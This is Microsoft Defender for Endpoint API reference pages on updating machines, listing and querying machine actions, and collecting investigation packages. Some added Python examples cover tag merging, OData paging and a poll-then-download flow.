api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Set the device value of a specific Machine.
See assign device values for more information.

Limitations
1. You can post on devices last seen according to your configured retention period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Manage security setting'. For more information, see Create and manage roles.
- The user needs to have access to the machine, based on machine group settings. For more information, see Create and manage machine groups.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{machineId}/setDeviceValue

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter | Type | Description
DeviceValue | Enum | Device value. Allowed values are: 'Normal', 'Low' and 'High'. Required.

Response
If successful, this method returns 200 - Ok response code and the updated Machine in
the response body.

Example

Request
Here is an example of a request that sets the device value to High.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/setDeviceValue

JSON

{
    "DeviceValue": "High"
}

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Update machine
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Updates properties of an existing Machine.

Updatable properties are: machineTags and deviceValue.

Limitations
1. You can update machines that are available in the API.
2. Update machine doesn't merge tags: existing tags must be included in the tags collection in the body, or they are removed (see Response).
3. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type                     Permission              Permission display name
Application                         Machine.ReadWrite.All   'Read and write machine information for all machines'
Delegated (work or school account)  Machine.ReadWrite       'Read and write machine information'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'Alerts investigation'. For more information, see Create and manage roles.
The user needs to have access to the device associated with the alert, based on device group settings. For more information, see Create and manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

PATCH /api/machines/{machineId}

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply the values for the relevant fields that should be updated.

Existing properties that aren't included in the request body will maintain their previous
values or be recalculated based on changes to other property values.

For best performance, you shouldn't include existing values that haven't changed.

Property     Type               Description
machineTags  String collection  Set of machine tags.
deviceValue  Nullable Enum      The value of the device. Possible values are: 'Normal', 'Low' and 'High'.

Response
If successful, this method returns 200 OK, and the machine entity in the response body with the updated properties.

If the machine tags collection in the body doesn't contain the existing machine tags, all tags are replaced with the tags provided in the request body.

If a machine with the specified ID wasn't found - 404 Not Found.

Example

Request
Here's an example of the request.

HTTP

PATCH https://api.securitycenter.microsoft.com/api/machines/{machineId}

JSON

{
    "deviceValue": "Normal",
    "machineTags": [
        "Demo Device",
        "Generic User Machine - Attack Source",
        "Windows 10",
        "Windows11",
        "Windows Insider - Fast"
    ]
}
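Because the PATCH replaces the whole machineTags collection, a client has to resend every tag it wants to keep. The following Python is an added example, not Microsoft's code: it merges the tags a machine already has with the ones to add or drop, emits only the fields that changed, and models what the service keeps when existing tags are left out of the body. CURRENT_TAGS is constructed sample data.

```python
import json

# Constructed sample: tags a machine currently carries, as a client would read
# them from the machine entity before patching (illustrative values).
CURRENT_TAGS = ["Demo Device", "Windows 10"]

ALLOWED_DEVICE_VALUES = ("Normal", "Low", "High")


def build_machine_patch(current_tags, add_tags=(), remove_tags=(), device_value=None):
    """Return the JSON body for PATCH /api/machines/{machineId}.

    The service replaces the whole machineTags collection with the one in the
    body, so every tag that should survive is resent. Order is preserved and
    duplicates are dropped. Fields that did not change are left out, as the
    page recommends; an empty dict means there is nothing to send.
    """
    if device_value is not None and device_value not in ALLOWED_DEVICE_VALUES:
        raise ValueError(f"deviceValue must be one of {ALLOWED_DEVICE_VALUES}")
    drop = set(remove_tags)
    merged = []
    for tag in list(current_tags) + list(add_tags):
        if tag not in drop and tag not in merged:
            merged.append(tag)
    body = {}
    if merged != list(current_tags):
        body["machineTags"] = merged
    if device_value is not None:
        body["deviceValue"] = device_value
    return body


def tags_after_patch(current_tags, body):
    """Model the documented server behaviour: a body that carries machineTags
    replaces the collection outright; a body without it leaves tags untouched.
    """
    return list(body["machineTags"]) if "machineTags" in body else list(current_tags)


def serialize_patch(body):
    """Encode the body as the application/json payload for the PATCH request."""
    return json.dumps(body, separators=(",", ":"))
```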



MachineAction resource type
Article • 02/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

For more information, see Response Actions.

Method                             Return Type     Description
List MachineActions                Machine Action  List Machine Action entities.
Get MachineAction                  Machine Action  Get a single Machine Action entity.
Collect investigation package      Machine Action  Collect investigation package from a machine.
Get investigation package SAS URI  Machine Action  Get URI for downloading the investigation package.
Isolate machine                    Machine Action  Isolate machine from network.
Release machine from isolation     Machine Action  Release machine from isolation.
Restrict app execution             Machine Action  Restrict application execution.
Remove app restriction             Machine Action  Remove application execution restriction.
Run antivirus scan                 Machine Action  Run an AV scan using Windows Defender (when applicable).
Offboard machine                   Machine Action  Offboard machine from Microsoft Defender for Endpoint.
Stop and quarantine file           Machine Action  Stop execution of a file on a machine and delete it.
Run live response                  Machine Action  Runs a sequence of live response commands on a device.
Get live response result           URL entity      Retrieves specific live response command result download link by its index.
Cancel machine action              Machine Action  Cancel an active machine action.

Properties

Property                 Type            Description
ID                       Guid            Identity of the Machine Action entity.
type                     Enum            Type of the action. Possible values are: RunAntiVirusScan, Offboard, LiveResponse, CollectInvestigationPackage, Isolate, Unisolate, StopAndQuarantineFile, RestrictCodeExecution, and UnrestrictCodeExecution.
scope                    String          Scope of the action. Full or Selective for Isolation, Quick or Full for antivirus scan.
requestor                String          Identity of the person that executed the action.
externalID               String          Id the customer can submit in the request for custom correlation.
requestSource            String          The name of the user/application that submitted the action.
commands                 Array           Commands to run. Allowed values are PutFile, RunScript, GetFile.
cancellationRequestor    String          Identity of the person that canceled the action.
requestorComment         String          Comment that was written when issuing the action.
cancellationComment      String          Comment that was written when canceling the action.
status                   Enum            Current status of the command. Possible values are: Pending, InProgress, Succeeded, Failed, TimeOut, and Cancelled.
machineId                String          ID of the machine on which the action was executed.
computerDnsName          String          Name of the machine on which the action was executed.
creationDateTimeUtc      DateTimeOffset  The date and time when the action was created.
cancellationDateTimeUtc  DateTimeOffset  The date and time when the action was canceled.
lastUpdateDateTimeUtc    DateTimeOffset  The last date and time when the action status was updated.
title                    String          Machine action title.
relatedFileInfo          Class           Contains two properties: string fileIdentifier, and Enum fileIdentifierType with the possible values Sha1, Sha256, and Md5.

Json representation
JSON

{
    "id": "5382f7ea-7557-4ab7-9782-d50480024a4e",
    "type": "Isolate",
    "scope": "Selective",
    "requestor": "Analyst@TestPrd.onmicrosoft.com",
    "requestorComment": "test for docs",
    "status": "Succeeded",
    "machineId": "7b1f4967d9728e5aa3c06a9e617a22a4a5a17378",
    "computerDnsName": "desktop-test",
    "creationDateTimeUtc": "2019-01-02T14:39:38.2262283Z",
    "lastUpdateDateTimeUtc": "2019-01-02T14:40:44.6596267Z",
    "relatedFileInfo": null
}



List MachineActions API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of Machine Actions.

Supports OData V4 queries.

The OData $filter query is supported on: id, status, machineId, type, requestor, and creationDateTimeUtc properties.

$top with max value of 10,000

$skip

See examples at OData queries with Microsoft Defender for Endpoint


Limitations
1. Maximum page size is 10,000.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type                     Permission              Permission display name
Application                         Machine.Read.All        'Read all machine profiles'
Application                         Machine.ReadWrite.All   'Read and write all machine information'
Delegated (work or school account)  Machine.Read            'Read machine information'
Delegated (work or school account)  Machine.ReadWrite       'Read and write machine information'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK response code with a collection of machineAction entities.

Example 1

Example 1 request
Here is an example of the request on an organization that has three MachineActions.

HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions

Example 1 response
Here is an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json
{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
    "value": [
        {
            "id": "69dc3630-1ccc-4342-acf3-35286eec741d",
            "type": "CollectInvestigationPackage",
            "scope": null,
            "requestor": "Analyst@contoso.com",
            "requestorComment": "test",
            "status": "Succeeded",
            "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
            "computerDnsName": "desktop-39g9tgl",
            "creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z",
            "lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
            "relatedFileInfo": null
        },
        {
            "id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
            "type": "RunAntiVirusScan",
            "scope": "Full",
            "requestor": "Analyst@contoso.com",
            "requestorComment": "Check machine for viruses due to alert 3212",
            "status": "Succeeded",
            "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
            "computerDnsName": "desktop-39g9tgl",
            "creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
            "lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
            "relatedFileInfo": null
        },
        {
            "id": "44cffc15-0e3d-4cbf-96aa-bf76f9b27f5e",
            "type": "StopAndQuarantineFile",
            "scope": null,
            "requestor": "Analyst@contoso.com",
            "requestorComment": "test",
            "status": "Succeeded",
            "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
            "computerDnsName": "desktop-39g9tgl",
            "creationDateTimeUtc": "2018-12-04T12:15:40.6052029Z",
            "lastUpdateTimeUtc": "2018-12-04T12:16:14.2899973Z",
            "relatedFileInfo": {
                "fileIdentifier": "a0c659857ccbe457fdaf5fe21d54efdcbf6f6508",
                "fileIdentifierType": "Sha1"
            }
        }
    ]
}

Example 2

Example 2 request
Here is an example of a request that filters the MachineActions by machine ID and
shows the latest two MachineActions.

HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions?$filter=machineId eq 'f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f'&$top=2

Example 2 response
Here is an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json
{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
    "value": [
        {
            "id": "69dc3630-1ccc-4342-acf3-35286eec741d",
            "type": "CollectInvestigationPackage",
            "scope": null,
            "requestor": "Analyst@contoso.com",
            "requestorComment": "test",
            "status": "Succeeded",
            "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
            "computerDnsName": "desktop-39g9tgl",
            "creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z",
            "lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
            "relatedFileInfo": null
        },
        {
            "id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
            "type": "RunAntiVirusScan",
            "scope": "Full",
            "requestor": "Analyst@contoso.com",
            "requestorComment": "Check machine for viruses due to alert 3212",
            "status": "Succeeded",
            "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
            "computerDnsName": "desktop-39g9tgl",
            "creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
            "lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
            "relatedFileInfo": null
        }
    ]
}
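The $filter, $top and $skip options above are what a client uses to page through a tenant's action history and spot failed or stuck actions. The Python below is an added example, not Microsoft's code: it builds the query string with correct OData string quoting (single quotes, doubled inside), enforces the 10,000 page-size cap, walks pages with $top/$skip through an injected fetch function, and tallies actions by type and status. SAMPLE_ACTIONS and fake_fetch are constructed stand-ins so the block runs offline.

```python
MAX_PAGE = 10_000  # maximum page size stated on this page
FILTERABLE = {"id", "status", "machineId", "type", "requestor", "creationDateTimeUtc"}

# Constructed sample actions, shaped like the entries on this page
# (ids and machine ids are placeholders, not real data).
SAMPLE_ACTIONS = [
    {"id": "00000000-0000-0000-0000-000000000001", "type": "CollectInvestigationPackage",
     "status": "Succeeded", "machineId": "machine-a", "requestor": "Analyst@contoso.com",
     "creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z"},
    {"id": "00000000-0000-0000-0000-000000000002", "type": "RunAntiVirusScan",
     "status": "Succeeded", "machineId": "machine-a", "requestor": "Analyst@contoso.com",
     "creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z"},
    {"id": "00000000-0000-0000-0000-000000000003", "type": "Isolate",
     "status": "Failed", "machineId": "machine-b", "requestor": "Analyst@contoso.com",
     "creationDateTimeUtc": "2018-12-05T08:00:00.0000000Z"},
]


def odata_literal(value):
    """Quote a string for an OData V4 $filter: single quotes, doubled inside."""
    return "'" + str(value).replace("'", "''") + "'"


def build_query(filters=None, top=None, skip=0, since_utc=None):
    """Build the query string for GET /api/machineactions (unencoded, as the
    page shows it; the HTTP client percent-encodes it on the wire).

    filters   - property -> value pairs, combined with 'and' using 'eq'
    since_utc - ISO 8601 UTC timestamp, emitted as creationDateTimeUtc gt <ts>
                (datetimeoffset literals are unquoted in OData V4)
    """
    clauses = []
    for prop, value in (filters or {}).items():
        if prop not in FILTERABLE:
            raise ValueError(f"$filter is not supported on {prop}")
        clauses.append(f"{prop} eq {odata_literal(value)}")
    if since_utc is not None:
        clauses.append(f"creationDateTimeUtc gt {since_utc}")
    parts = []
    if clauses:
        parts.append("$filter=" + " and ".join(clauses))
    if top is not None:
        if not 1 <= top <= MAX_PAGE:
            raise ValueError(f"$top must be between 1 and {MAX_PAGE}")
        parts.append(f"$top={top}")
    if skip:
        parts.append(f"$skip={skip}")
    return "&".join(parts)


def iter_machine_actions(fetch_page, filters=None, page_size=MAX_PAGE):
    """Yield every matching action, paging with $top/$skip until a short page.

    fetch_page(query) -> parsed JSON body of GET /api/machineactions?<query>;
    injected so the example runs offline.
    """
    skip = 0
    while True:
        items = fetch_page(build_query(filters, top=page_size, skip=skip)).get("value", [])
        yield from items
        if len(items) < page_size:
            return
        skip += page_size


def summarize(actions):
    """Count actions by (type, status) so failed or unfinished ones stand out."""
    counts = {}
    for action in actions:
        key = (action["type"], action["status"])
        counts[key] = counts.get(key, 0) + 1
    return counts


def fake_fetch(query):
    """Constructed stand-in for the service: honours 'eq' clauses in $filter,
    plus $top and $skip, over SAMPLE_ACTIONS."""
    params = dict(part.split("=", 1) for part in query.split("&") if part)
    rows = SAMPLE_ACTIONS
    for clause in params.get("$filter", "").split(" and "):
        if " eq " in clause:
            prop, literal = clause.split(" eq ", 1)
            wanted = literal[1:-1].replace("''", "'")
            rows = [row for row in rows if row.get(prop) == wanted]
    skip = int(params.get("$skip", 0))
    top = int(params.get("$top", MAX_PAGE))
    return {"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
            "value": rows[skip:skip + top]}
```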

Related topics
OData queries with Microsoft Defender for Endpoint


Get machineAction API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves specific Machine Action by its ID.

Limitations
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Defender for Endpoint APIs.

Permission type                     Permission              Permission display name
Application                         Machine.Read.All        'Read all machine profiles'
Application                         Machine.ReadWrite.All   'Read and write all machine information'
Delegated (work or school account)  Machine.Read            'Read machine information'
Delegated (work or school account)  Machine.ReadWrite       'Read and write machine information'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (for more information, see Create and manage roles).

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions/{id}

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK response code with a Machine Action entity. If a machine action entity with the specified ID wasn't found - 404 Not Found.

Example

Example request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions/2e9da30d-27f6-4208-81f2-9cd3d67893ba

Response example
Here's an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json
{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions/$entity",
    "id": "5382f7ea-7557-4ab7-9782-d50480024a4e",
    "type": "Isolate",
    "scope": "Selective",
    "requestor": "Analyst@TestPrd.onmicrosoft.com",
    "requestorComment": "test for docs",
    "status": "Succeeded",
    "machineId": "7b1f4967d9728e5aa3c06a9e617a22a4a5a17378",
    "computerDnsName": "desktop-test",
    "creationDateTimeUtc": "2019-01-02T14:39:38.2262283Z",
    "lastUpdateDateTimeUtc": "2019-01-02T14:40:44.6596267Z",
    "relatedFileInfo": null
}



Collect investigation package API
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Collect investigation package from a device.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Important

These response actions are only available for devices on Windows 10, version 1703 or later, and on Windows 11.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Defender for Endpoint APIs

Permission type                     Permission                Permission display name
Application                         Machine.CollectForensics  'Collect forensics'
Delegated (work or school account)  Machine.CollectForensics  'Collect forensics'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'Alerts Investigation' (see Create and manage roles for more information).
The user needs to have access to the device, based on device group settings (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/collectInvestigationPackage

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.


Request body
In the request body, supply a JSON object with the following parameters:

Parameter  Type    Description
Comment    String  Comment to associate with the action. Required.

Response
If successful, this method returns 201 - Created response code and Machine Action in
the response body. If a collection is already running, this returns 400 Bad Request.

Example

Request
Here is an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/fb9ab6be3965095a09c057be7c90f0a2/collectInvestigationPackage

JSON

{
"Comment": "Collect forensics due to alert 1234"
}



Get package SAS URI API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Get a URI that allows downloading of an Investigation package.

Important

These actions are only available for devices on Windows 10, version 1703 or later, and on Windows 11.

Limitations
Rate limitations for this API are 2 calls per minute and 120 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Access the Microsoft Defender for Endpoint APIs

Permission type                     Permission                Permission display name
Application                         Machine.Read.All          'Read all machine profiles'
Application                         Machine.ReadWrite.All     'Read and write all machine information'
Delegated (work or school account)  Machine.CollectForensics  'Collect forensics'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'Alerts Investigation' (for more information, see Create and manage roles).
The user needs to have access to the device, based on device group settings (for more information, see Create and manage device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions/{machine action id}/getPackageUri

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK response code with an object that holds the link to the package in the "value" property. This link is valid for a short time and should be used immediately to download the package to local storage. If the machine action for the collection exists but isn't complete, this returns 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions/7327b54fd718525cbca07dacde913b5ac3c85673/GetPackageUri

Response example
Here's an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Edm.String",
"value": "\"https://userrequests-
us.securitycenter.windows.com:443/safedownload/WDATP_Investigation_Package.z
ip?
token=gbDyj7y%2fbWGAZjn2sFiZXlliBTXOCVG7yiJ6mXNaQ9pLByC2Wxeno9mENsPFP3xMk5l%
2bZiJXjLvqAyNEzUNROxoM2I1er9dxzfVeBsxSmclJjPsAx%2btiNyxSz1Ax%2b5jaT5cL5bZg%2
b8wgbwY9urXbTpGjAKh6FB1e%2b0ypcWkPm8UkfOwsmtC%2biZJ2%2bPqnkkeQk7SKMNoAvmh9%2
fcqDIPKXGIBjMa0D9auzypOqd8bQXp7p2BnLSH136BxST8n9IHR4PILvRjAYW9kvtHkBpBitfydA
sUW4g2oDZSPN3kCLBOoo1C4w4Lkc9Bc3GNU2IW6dfB7SHcp7G9p4BDkeJl3VuDs6esCaeBorpn9F
KJ%2fXo7o9pdcI0hUPZ6Ds9hiPpwPUtz5J29CBE3QAopCK%2fsWlf6OW2WyXsrNRSnF1tVE5H3wX
pREzuhD7S4AIA3OIEZKzC4jIPLeMu%2bazZU9xGwuc3gICOaokbwMJiZTqcUuK%2fV9YdBdjdg8w
J16NDU96Pl6%2fgew2KYuk6Wo7ZuHotgHI1abcsvdlpe4AvixDbqcRJthsg2PpLRaFLm5av44UGk
eK6TJpFvxUn%2f9fg6Zk5yM1KUTHb8XGmutoCM8U9er6AzXZlY0gGc3D3bQOg41EJZkEZLyUEbk1
hXJB36ku2%2bW01cG71t7MxMBYz7%2bdXobxpdo%3d%3bRWS%2bCeoDfTyDcfH5pkCg6hYDmCOPr
%2fHYQuaUWUBNVnXURYkdyOzVHqp%2fe%2f1BNyPdVoVkpQHpz1pPS3b5g9h7IMmNKCk5gFq5m2n
Px6kk9EYtzx8Ndoa2m9Yj%2bSaf8zIFke86YnfQL4AYewsnQNJJh4wc%2bXxGlBq7axDcoiOdX91
rKzVicH3GSBkFoLFAKoegWWsF%2fEDZcVpF%2fXUA1K8HvB6dwyfy4y0sAqnNPxYTQ97mG7yHhxP
t4Pe9YF2UPPAJVuEf8LNlQ%2bWHC9%2f7msF6UUI4%2fca%2ftpjFs%2fSNeRE8%2fyQj21TI8YT
F1SowvaJuDc1ivEoeopNNGG%2bGI%2fX0SckaVxU9Hdkh0zbydSlT5SZwbSwescs0IpzECitBbaL
Uz4aT8KTs8T0lvx8D7Te3wVsKAJ1r3iFMQZrlk%2bS1WW8rvac7oHRx2HKURn1v7fDIQWgJr9aNs
NlFz4fLJ50T2qSHuuepkLVbe93Va072aMGhvr09WVKoTpAf1j2bcFZZU6Za5PxI32mr0k90FgiYF
J1F%2f1vRDrGwvWVWUkR3Z33m4g0gHa52W1FMxQY0TJIwbovD6FaSNDx7xhKZSd5IJ7r6P91Gez4
9PaZRcAZPjd%2bfbul3JNm1VqQPTLohT7wa0ymRiXpSST74xtFzuEBzNSNATdbngj3%2fwV4JesT
jZjIj5Dc%3d%3blumqauVlFuuO8MQffZgs0tLJ4Fq6fpeozPTdDf8Ll6XLegi079%2b4mSPFjTK0
y6eohstxdoOdom2wAHiZwk0u4KLKmRkfYOdT1wHY79qKoBQ3ZDHFTys9V%2fcwKGl%2bl8IenWDu
tHygn5IcA1y7GTZj4g%3d%3d\""
}
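Collecting a package is a three-call flow across the Collect investigation package, Get machineAction and Get package SAS URI APIs: start the action, poll it until its status is terminal, then ask for the link. The Python below is an added example, not Microsoft's code: it drives that flow through an injected send(method, url, body) transport so it runs offline, handles the documented 400 (collection already running) and 404 (package not complete) answers, and strips the escaped quotes the sample response wraps around the value. FakeDefenderApi is a constructed stand-in for the service; its ids and URL are placeholders.

```python
import time

BASE = "https://api.securitycenter.microsoft.com/api"
TERMINAL_STATES = {"Succeeded", "Failed", "TimeOut", "Cancelled"}


class ApiError(Exception):
    """Raised when the service answers with a status the flow cannot continue from."""


def collect_and_fetch_package_uri(send, machine_id, comment, poll_seconds=0.0, max_polls=20):
    """Start an investigation package collection and return its download URI.

    send(method, url, body=None) -> (status_code, parsed_json) is an injected
    transport (it is expected to add the Authorization: Bearer header). Steps:
      1. POST machines/{id}/collectInvestigationPackage -> 201 + MachineAction;
         400 means a collection is already running on that device.
      2. GET machineactions/{actionId} until the status is terminal.
      3. GET machineactions/{actionId}/getPackageUri -> 200 + {"value": uri};
         404 while the action exists but is not complete.
    """
    status, action = send("POST", f"{BASE}/machines/{machine_id}/collectInvestigationPackage",
                          {"Comment": comment})
    if status == 400:
        raise ApiError("a collection is already running on this device")
    if status != 201:
        raise ApiError(f"unexpected HTTP {status} when starting the collection")
    action_id = action["id"]

    for _ in range(max_polls):
        status, action = send("GET", f"{BASE}/machineactions/{action_id}")
        if status != 200:
            raise ApiError(f"unexpected HTTP {status} when reading action {action_id}")
        if action["status"] in TERMINAL_STATES:
            break
        time.sleep(poll_seconds)
    else:
        raise ApiError(f"action {action_id} still {action['status']} after {max_polls} polls")
    if action["status"] != "Succeeded":
        raise ApiError(f"collection ended with status {action['status']}")

    status, body = send("GET", f"{BASE}/machineactions/{action_id}/getPackageUri")
    if status == 404:
        raise ApiError("package not available yet; call getPackageUri again shortly")
    if status != 200:
        raise ApiError(f"unexpected HTTP {status} from getPackageUri")
    # The value is a short-lived SAS link (the page's sample wraps it in escaped
    # quotes): download right away and keep it out of logs.
    return body["value"].strip('"')


class FakeDefenderApi:
    """Constructed stand-in for the service so the flow can run offline: the
    action moves Pending -> InProgress -> Succeeded, one step per poll, and
    getPackageUri answers 404 until the action has succeeded."""

    def __init__(self):
        self.polls = 0
        self.running = False
        self.action_id = "00000000-0000-0000-0000-0000000000aa"  # placeholder id

    def __call__(self, method, url, body=None):
        if method == "POST" and url.endswith("/collectInvestigationPackage"):
            if self.running:
                return 400, {"error": {"message": "collection already running"}}
            self.running = True
            return 201, {"id": self.action_id, "type": "CollectInvestigationPackage",
                         "status": "Pending", "requestorComment": body["Comment"]}
        if method == "GET" and url.endswith("/getPackageUri"):
            if self.polls < 3:
                return 404, {}
            return 200, {"@odata.context": f"{BASE}/$metadata#Edm.String",
                         "value": "\"https://example.invalid/safedownload/WDATP_Investigation_Package.zip?token=PLACEHOLDER\""}
        if method == "GET" and "/machineactions/" in url:
            self.polls += 1
            state = ("Pending", "InProgress", "Succeeded")[min(self.polls, 3) - 1]
            return 200, {"id": self.action_id, "type": "CollectInvestigationPackage", "status": state}
        return 404, {}
```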



Get live response results
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a specific live response command result by its index.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Minimum requirements
Before you can initiate a session on a device, make sure you fulfill the following requirements:

Verify that you're running a supported version of Windows.

Devices must be running one of the following versions of Windows:

Windows 11

Windows 10
